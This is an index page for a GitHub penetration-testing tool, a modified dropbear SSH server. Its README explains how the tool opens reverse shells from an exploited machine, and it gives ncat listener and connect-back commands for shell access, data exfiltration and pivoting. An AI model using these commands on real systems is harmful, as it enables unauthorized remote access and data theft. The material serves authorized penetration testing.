Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mrschyte/pentestkoala
Modified dropbear server which acts as a client and allows authless login
https://github.com/mrschyte/pentestkoala
Last synced: 3 months ago
JSON representation
Modified dropbear server which acts as a client and allows authless login
- Host: GitHub
- URL: https://github.com/mrschyte/pentestkoala
- Owner: mrschyte
- License: other
- Created: 2017-04-15T17:55:17.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2018-08-27T12:44:47.000Z (about 6 years ago)
- Last Synced: 2024-04-12T18:10:21.451Z (7 months ago)
- Language: C
- Size: 2.42 MB
- Stars: 125
- Watchers: 8
- Forks: 31
- Open Issues: 0
-
Metadata Files:
- Readme: README
- Changelog: CHANGES
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - mrschyte/pentestkoala - Modified dropbear server which acts as a client and allows authless login (C)
README
Koala is a patched version of the dropbear SSH server that instead of
binding to a port opens up reverse shells by connecting to a remote
client.
This is useful for gaining a pty terminal on an exploited machine and
also for secure exfiltration of data via SSH port forwarding. Pivoting
can also be done by using the dynamic SSH port forwarding feature.
[Usage]
Run the following command on the client to listen for the SSH connection:
$ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999'
On the exploited host run:
$ ./dropbear -p client-host:5000
Now on the client, connect to port 9999 to open up a shell:
$ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999